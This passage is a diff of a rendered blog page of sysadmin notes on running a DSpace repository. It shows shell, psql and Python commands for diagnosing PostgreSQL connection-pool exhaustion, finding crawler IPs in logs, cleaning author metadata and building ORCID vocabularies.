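import psycopg2

conn = psycopg2.connect(dbname='dspace', user='dspace', password='fuuu')
cur = conn.cursor()
cur.execute("""
    SELECT application_name, state, count(*)
      FROM pg_stat_activity
     WHERE application_name IN ('dspaceWeb', 'dspaceApi', 'dspaceCli')
     GROUP BY application_name, state
     ORDER BY application_name, state
""")
for pool, state, total in cur.fetchall():
    print(f'{pool:10} {state or "unknown":20} {total}')
conn.close()
</code></pre>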
@ -252,21 +252,21 @@ $ grep -c 'PostgreSQL JDBC' /tmp/pg_stat_activity*
<ul>
<li>Indeed it seems like there were over 1800 sessions today around the hours of 10 and 11 AM:</li>
</ul>
<pre><code>$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1828
</code></pre><ul>
<li>CGSpace went down again a few hours later, and now the connections to the dspaceWeb pool are maxed at 250 (the new limit I imposed with the new separate pool scheme)</li>
<li>What&rsquo;s interesting is that the DSpace log says the connections are all busy:</li>
</ul>
<pre><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-328] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
<pre tabindex="0"><code>org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-328] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:250; busy:250; idle:0; lastwait:5000].
</code></pre><ul>
<li>&hellip; but in PostgreSQL I see them <code>idle</code> or <code>idle in transaction</code>:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -c dspaceWeb
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -c dspaceWeb
250
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c idle
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c idle
250
$ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle in transaction&quot;
$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
187
</code></pre><ul>
<li>What the fuck, does DSpace think all connections are busy?</li>
@ -274,13 +274,13 @@ $ psql -c 'select * from pg_stat_activity' | grep dspaceWeb | grep -c &quot;idle
<li>I will try <code>testOnReturn='true'</code> too, just to add more validation, because I&rsquo;m fucking grasping at straws</li>
<li>Also, WTF, there was a heap space error randomly in catalina.out:</li>
</ul>
<pre><code>Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
Exception in thread &quot;http-bio-127.0.0.1-8081-exec-58&quot; java.lang.OutOfMemoryError: Java heap space
<pre tabindex="0"><code>Wed Feb 07 15:01:54 UTC 2018 | Query:containerItem:91917 AND type:2
Exception in thread &#34;http-bio-127.0.0.1-8081-exec-58&#34; java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>I&rsquo;m trying to find a way to determine what was using all those Tomcat sessions, but parsing the DSpace log is hard because some IPs are IPv6, which contain colons!</li>
<li>Looking at the first crash this morning around 11, I see these IPv4 addresses making requests around 10 and 11AM:</li>
</ul>
<pre><code>$ grep -E '^2018-02-07 (10|11)' dspace.log.2018-02-07 | grep -o -E 'ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -n | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code>$ grep -E &#39;^2018-02-07 (10|11)&#39; dspace.log.2018-02-07 | grep -o -E &#39;ip_addr=[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}&#39; | sort -n | uniq -c | sort -n | tail -n 20
34 ip_addr=46.229.168.67
34 ip_addr=46.229.168.73
37 ip_addr=46.229.168.76
@ -304,27 +304,26 @@ Exception in thread &quot;http-bio-127.0.0.1-8081-exec-58&quot; java.lang.OutOfM
</code></pre><ul>
<li>These IPs made thousands of sessions today:</li>
</ul>
<pre><code>$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 104.196.152.243 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
530
$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 207.46.13.71 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
859
$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 40.77.167.62 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
610
$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 54.83.138.123 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
8
$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 207.46.13.135 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
826
$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 68.180.228.157 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
727
$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 40.77.167.36 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
181
$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 130.82.1.40 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
24
$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 207.46.13.54 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
166
$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
$ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
992
</code></pre><ul>
<li>Let&rsquo;s investigate who these IPs belong to:
<ul>
@ -342,11 +341,11 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<li>What in the actual fuck, why is our load doing this? It&rsquo;s gotta be something fucked up with the database pool being &ldquo;busy&rdquo; but everything is fucking idle</li>
<li>One that I should probably add in nginx is 54.83.138.123, which is apparently the following user agent:</li>
</ul>
<pre><code>BUbiNG (+http://law.di.unimi.it/BUbiNG.html)
<pre tabindex="0"><code>BUbiNG (+http://law.di.unimi.it/BUbiNG.html)
</code></pre><ul>
<li>This one makes two thousand requests per day or so recently:</li>
</ul>
<pre><code># grep -c BUbiNG /var/log/nginx/access.log /var/log/nginx/access.log.1
<pre tabindex="0"><code># grep -c BUbiNG /var/log/nginx/access.log /var/log/nginx/access.log.1
/var/log/nginx/access.log:1925
/var/log/nginx/access.log.1:2029
</code></pre><ul>
@ -355,13 +354,13 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<li>Helix84 recommends restarting PostgreSQL instead of Tomcat because it restarts quicker</li>
<li>This is how the connections looked when it crashed this afternoon:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
290 dspaceWeb
</code></pre><ul>
<li>This is how it is right now:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
5 dspaceWeb
</code></pre><ul>
@ -378,11 +377,11 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<li>Switch authority.controlled off and change authorLookup to lookup, and the ORCID badge doesn&rsquo;t show up on the item</li>
<li>Leave all settings alone but change choices.presentation to lookup: the ORCID badge is there, but item submission uses the LC Name Authority and breaks with this error:</li>
</ul>
<pre><code>Field dc_contributor_author has choice presentation of type &quot;select&quot;, it may NOT be authority-controlled.
<pre tabindex="0"><code>Field dc_contributor_author has choice presentation of type &#34;select&#34;, it may NOT be authority-controlled.
</code></pre><ul>
<li>If I change choices.presentation to suggest it gives this error:</li>
</ul>
<pre><code>xmlui.mirage2.forms.instancedCompositeFields.noSuggestionError
<pre tabindex="0"><code>xmlui.mirage2.forms.instancedCompositeFields.noSuggestionError
</code></pre><ul>
<li>So I don&rsquo;t think we can disable the ORCID lookup function and keep the ORCID badges</li>
</ul>
@ -394,12 +393,12 @@ $ grep 46.229.168 dspace.log.2018-02-07 | grep -o -E 'session_id=[A-Z0-9]{32}' |
<ul>
<li>I downloaded the PDF and manually generated a thumbnail with ImageMagick and it looked better:</li>
</ul>
<pre><code>$ convert CCAFS_WP_223.pdf\[0\] -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_cmyk.icc -thumbnail 600x600 -flatten -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_rgb.icc CCAFS_WP_223.jpg
<pre tabindex="0"><code>$ convert CCAFS_WP_223.pdf\[0\] -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_cmyk.icc -thumbnail 600x600 -flatten -profile /usr/local/share/ghostscript/9.22/iccprofiles/default_rgb.icc CCAFS_WP_223.jpg
</code></pre><p><img src="/cgspace-notes/2018/02/CCAFS_WP_223.jpg" alt="Manual thumbnail"></p>
<ul>
<li>Peter sent me corrected author names last week but the file encoding is messed up:</li>
</ul>
<pre><code>$ isutf8 authors-2018-02-05.csv
<pre tabindex="0"><code>$ isutf8 authors-2018-02-05.csv
authors-2018-02-05.csv: line 100, char 18, byte 4179: After a first byte between E1 and EC, expecting the 2nd byte between 80 and BF.
</code></pre><ul>
<li>The <code>isutf8</code> program comes from <code>moreutils</code></li>
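<li>If <code>isutf8</code> is not handy, a small Python sketch (illustrative only; the filename is from the notes above) can report the same kind of information:</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env python3
# Sketch: report lines that are not valid UTF-8, similar to what isutf8 does.
# The filename comes from the notes above; everything else is illustrative.
with open('authors-2018-02-05.csv', 'rb') as f:
    for number, line in enumerate(f, start=1):
        try:
            line.decode('utf-8')
        except UnicodeDecodeError as err:
            print(f'line {number}, byte {err.start}: {err.reason}')
</code></pre>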
@ -409,18 +408,18 @@ authors-2018-02-05.csv: line 100, char 18, byte 4179: After a first byte between
<li>I updated my <code>fix-metadata-values.py</code> and <code>delete-metadata-values.py</code> scripts on the scripts page: <a href="https://github.com/ilri/DSpace/wiki/Scripts">https://github.com/ilri/DSpace/wiki/Scripts</a></li>
<li>I ran the 342 author corrections (after trimming whitespace and excluding those with <code>||</code> and other syntax errors) on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-342-Authors-2018-02-11.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Then I ran a full Discovery re-indexing:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>That reminds me that Bizu had asked me to fix some of Alan Duncan&rsquo;s names in December</li>
<li>I see he actually has some variations with &ldquo;Duncan, Alan J.&quot;: <a href="https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=">https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=</a></li>
<li>I see he actually has some variations with &ldquo;Duncan, Alan J.&rdquo;: <a href="https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=">https://cgspace.cgiar.org/discover?filtertype_1=author&amp;filter_relational_operator_1=contains&amp;filter_1=Duncan%2C+Alan&amp;submit_apply_filter=&amp;query=</a></li>
<li>I will just update those for her too and then restart the indexing:</li>
</ul>
<pre><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
text_value | authority | confidence
-----------------+--------------------------------------+------------
Duncan, Alan J. | 5ff35043-942e-4d0a-b377-4daed6e3c1a3 | 600
@ -434,9 +433,9 @@ $ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
(8 rows)
dspace=# begin;
dspace=# update metadatavalue set text_value='Duncan, Alan', authority='a6486522-b08a-4f7a-84f9-3a73ce56034d', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Duncan, Alan%';
dspace=# update metadatavalue set text_value=&#39;Duncan, Alan&#39;, authority=&#39;a6486522-b08a-4f7a-84f9-3a73ce56034d&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Duncan, Alan%&#39;;
UPDATE 216
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like '%Duncan, Alan%';
dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%Duncan, Alan%&#39;;
text_value | authority | confidence
--------------+--------------------------------------+------------
Duncan, Alan | a6486522-b08a-4f7a-84f9-3a73ce56034d | 600
@ -464,7 +463,7 @@ dspace=# commit;
<li>I see that in <a href="/cgspace-notes/2017-04/">April, 2017</a> I just used a SQL query to get a user&rsquo;s submissions by checking the <code>dc.description.provenance</code> field</li>
<li>So for Abenet, I can check her submissions in December, 2017 with:</li>
</ul>
<pre><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*yabowork.*2017-12.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*yabowork.*2017-12.*&#39;;
</code></pre><ul>
<li>I emailed Peter to ask whether we can move DSpace Test to a new Linode server and attach 300 GB of disk space to it</li>
<li>This would be using <a href="https://www.linode.com/blockstorage">Linode&rsquo;s new block storage volumes</a></li>
@ -477,14 +476,14 @@ dspace=# commit;
<li>Peter said he was getting a &ldquo;socket closed&rdquo; error on CGSpace</li>
<li>I looked in the dspace.log.2018-02-13 and saw one recent one:</li>
</ul>
<pre><code>2018-02-13 12:50:13,656 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
<pre tabindex="0"><code>2018-02-13 12:50:13,656 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL QueryTable Error -
org.postgresql.util.PSQLException: An I/O error occurred while sending to the backend.
...
Caused by: java.net.SocketException: Socket closed
</code></pre><ul>
<li>Could be because of the <code>removeAbandoned=&quot;true&quot;</code> that I enabled in the JDBC connection pool last week?</li>
</ul>
<pre><code>$ grep -c &quot;java.net.SocketException: Socket closed&quot; dspace.log.2018-02-*
<pre tabindex="0"><code>$ grep -c &#34;java.net.SocketException: Socket closed&#34; dspace.log.2018-02-*
dspace.log.2018-02-01:0
dspace.log.2018-02-02:0
dspace.log.2018-02-03:0
@ -503,7 +502,7 @@ dspace.log.2018-02-13:4
<li>I will increase the removeAbandonedTimeout from its default of 60 to 90 and enable logAbandoned</li>
<li>Peter hit this issue one more time, and this is apparently what Tomcat&rsquo;s catalina.out log says when an abandoned connection is removed:</li>
</ul>
<pre><code>Feb 13, 2018 2:05:42 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
<pre tabindex="0"><code>Feb 13, 2018 2:05:42 PM org.apache.tomcat.jdbc.pool.ConnectionPool abandon
WARNING: Connection has been abandoned PooledConnection[org.postgresql.jdbc.PgConnection@22e107be]:java.lang.Exception
</code></pre><h2 id="2018-02-14">2018-02-14</h2>
<ul>
@ -521,41 +520,41 @@ WARNING: Connection has been abandoned PooledConnection[org.postgresql.jdbc.PgCo
<li>Atmire responded on the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=560">DSpace 5.8 compatibility ticket</a> and said they will let me know if they want me to give them a clean 5.8 branch</li>
<li>I formatted my list of ORCID IDs as a controlled vocabulary, sorted alphabetically, then ran through XML tidy:</li>
</ul>
<pre><code>$ sort cgspace-orcids.txt &gt; dspace/config/controlled-vocabularies/cg-creator-id.xml
<pre tabindex="0"><code>$ sort cgspace-orcids.txt &gt; dspace/config/controlled-vocabularies/cg-creator-id.xml
$ add XML formatting...
$ tidy -xml -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre><ul>
<li>It seems the tidy fucks up accents, for example it turns <code>Adriana Tofiño (0000-0001-7115-7169)</code> into <code>Adriana TofiÃ±o (0000-0001-7115-7169)</code></li>
<li>We need to force UTF-8:</li>
</ul>
<pre><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
<pre tabindex="0"><code>$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
</code></pre><ul>
<li>This preserves special accent characters</li>
<li>I tested the display and store of these in the XMLUI and PostgreSQL and it looks good</li>
<li>Sisay exported all ILRI, CIAT, etc authors from ORCID and sent a list of 600+</li>
<li>Peter combined it with mine and we have 1204 unique ORCIDs!</li>
</ul>
<pre><code>$ grep -coE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv
<pre tabindex="0"><code>$ grep -coE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv
1204
$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
$ grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; CGcenter_ORCID_ID_combined.csv | sort | uniq | wc -l
1204
</code></pre><ul>
<li>Also, save that regex for the future because it will be very useful!</li>
<li>CIAT sent a list of their authors' ORCIDs and combined with ours there are now 1227:</li>
<li>CIAT sent a list of their authors&rsquo; ORCIDs and combined with ours there are now 1227:</li>
</ul>
<pre><code>$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat CGcenter_ORCID_ID_combined.csv ciat-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1227
</code></pre><ul>
<li>There are some formatting issues with names in Peter&rsquo;s list, so I should remember to re-generate the list of names from ORCID&rsquo;s API once we&rsquo;re done</li>
<li>The <code>dspace cleanup -v</code> currently fails on CGSpace with the following:</li>
</ul>
<pre><code> - Deleting bitstream record from database (ID: 149473)
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(149473) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code> - Deleting bitstream record from database (ID: 149473)
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(149473) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is to update the bitstream table, as I&rsquo;ve discovered several other times in 2016 and 2017:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (149473);&#39;
UPDATE 1
</code></pre><ul>
<li>Then the cleanup process will continue for a while and hit another foreign key conflict, and eventually it will complete after you manually resolve them all</li>
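<li>In principle that fix-and-retry cycle could be scripted; a rough, untested sketch (the dspace binary path is a placeholder, and the error format and SQL fix are taken from the output above):</li>
</ul>
<pre tabindex="0"><code>#!/usr/bin/env python3
# Untested sketch: re-run "dspace cleanup" and null out the offending
# primary_bitstream_id whenever it hits the foreign key error above.
import re
import subprocess

DSPACE = '/path/to/dspace/bin/dspace'  # placeholder for [dspace]/bin/dspace

for _ in range(100):
    result = subprocess.run([DSPACE, 'cleanup', '-v'],
                            capture_output=True, text=True)
    match = re.search(r'Key \(bitstream_id\)=\((\d+)\)',
                      result.stdout + result.stderr)
    if not match:
        break  # cleanup finished (or failed for some other reason)
    bitstream_id = match.group(1)
    print(f'Unsetting primary bitstream {bitstream_id} and retrying...')
    subprocess.run(['psql', 'dspace', '-c',
                    f'update bundle set primary_bitstream_id=NULL '
                    f'where primary_bitstream_id in ({bitstream_id});'])
</code></pre>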
@ -575,25 +574,25 @@ UPDATE 1
<li>I only looked quickly in the logs but saw a bunch of database errors</li>
<li>PostgreSQL connections are currently:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | uniq -c
2 dspaceApi
1 dspaceWeb
3 dspaceApi
</code></pre><ul>
<li>I see shitloads of memory errors in Tomcat&rsquo;s logs:</li>
</ul>
<pre><code># grep -c &quot;Java heap space&quot; /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#34;Java heap space&#34; /var/log/tomcat7/catalina.out
56
</code></pre><ul>
<li>And shit tons of database connections abandoned:</li>
</ul>
<pre><code># grep -c 'org.apache.tomcat.jdbc.pool.ConnectionPool abandon' /var/log/tomcat7/catalina.out
<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
612
</code></pre><ul>
<li>I have no fucking idea why it crashed</li>
<li>The XMLUI activity looks like:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &quot;15/Feb/2018&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 /var/log/nginx/error.log /var/log/nginx/error.log.1 | grep -E &#34;15/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
715 63.143.42.244
746 213.55.99.121
886 68.180.228.157
@ -610,7 +609,7 @@ UPDATE 1
<li>I made a pull request to fix it (<a href="https://github.com/ilri/DSpace/pull/354">#354</a>)</li>
<li>I should remember to update existing values in PostgreSQL too:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value='United States Agency for International Development' where resource_type_id=2 and metadata_field_id=29 and text_value like '%U.S. Agency for International Development%';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
UPDATE 2
</code></pre><h2 id="2018-02-18">2018-02-18</h2>
<ul>
@ -624,7 +623,7 @@ UPDATE 2
<li>Run system updates on DSpace Test (linode02) and reboot the server</li>
<li>Looking back at the system errors on 2018-02-15, I wonder what the fuck caused this:</li>
</ul>
<pre><code>$ wc -l dspace.log.2018-02-1{0..8}
<pre tabindex="0"><code>$ wc -l dspace.log.2018-02-1{0..8}
383483 dspace.log.2018-02-10
275022 dspace.log.2018-02-11
249557 dspace.log.2018-02-12
@ -638,21 +637,21 @@ UPDATE 2
<li>From an average of a few hundred thousand to over four million lines in DSpace log?</li>
<li>Using grep&rsquo;s <code>-B1</code> I can see the line before the heap space error, which has the time, ie:</li>
</ul>
<pre><code>2018-02-15 16:02:12,748 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
<pre tabindex="0"><code>2018-02-15 16:02:12,748 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
</code></pre><ul>
<li>So these errors happened at hours 16, 18, 19, and 20</li>
<li>Let&rsquo;s see what was going on in nginx then:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | wc -l
168571
# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &quot;15/Feb/2018:(16|18|19|20)&quot; | wc -l
# zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | wc -l
8188
</code></pre><ul>
<li>Only 8,000 requests during those four hours, out of 170,000 the whole day!</li>
<li>And the usage of XMLUI, REST, and OAI looks SUPER boring:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &quot;15/Feb/2018:(16|18|19|20)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log.{3,4}.gz | grep -E &#34;15/Feb/2018:(16|18|19|20)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
111 95.108.181.88
158 45.5.184.221
201 104.196.152.243
@ -677,42 +676,42 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
<ul>
<li>Combined list of CGIAR author ORCID iDs is up to 1,500:</li>
</ul>
<pre><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI-csv.csv CGcenter_ORCID_ID_combined.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
1571
</code></pre><ul>
<li>I updated my <code>resolve-orcids-from-solr.py</code> script to be able to resolve ORCID identifiers from a text file so I renamed it to <code>resolve-orcids.py</code></li>
<li>Also, I updated it so it uses several new options:</li>
</ul>
<pre><code>$ ./resolve-orcids.py -i input.txt -o output.txt
<pre tabindex="0"><code>$ ./resolve-orcids.py -i input.txt -o output.txt
$ cat output.txt
Ali Ramadhan: 0000-0001-5019-1368
Ahmad Maryudi: 0000-0001-5051-7217
</code></pre><ul>
<li>I was running this on the new list of 1571 and found an error:</li>
</ul>
<pre><code>Looking up the name associated with ORCID iD: 0000-0001-9634-1958
<pre tabindex="0"><code>Looking up the name associated with ORCID iD: 0000-0001-9634-1958
Traceback (most recent call last):
File &quot;./resolve-orcids.py&quot;, line 111, in &lt;module&gt;
File &#34;./resolve-orcids.py&#34;, line 111, in &lt;module&gt;
read_identifiers_from_file()
File &quot;./resolve-orcids.py&quot;, line 37, in read_identifiers_from_file
File &#34;./resolve-orcids.py&#34;, line 37, in read_identifiers_from_file
resolve_orcid_identifiers(orcids)
File &quot;./resolve-orcids.py&quot;, line 65, in resolve_orcid_identifiers
family_name = data['name']['family-name']['value']
TypeError: 'NoneType' object is not subscriptable
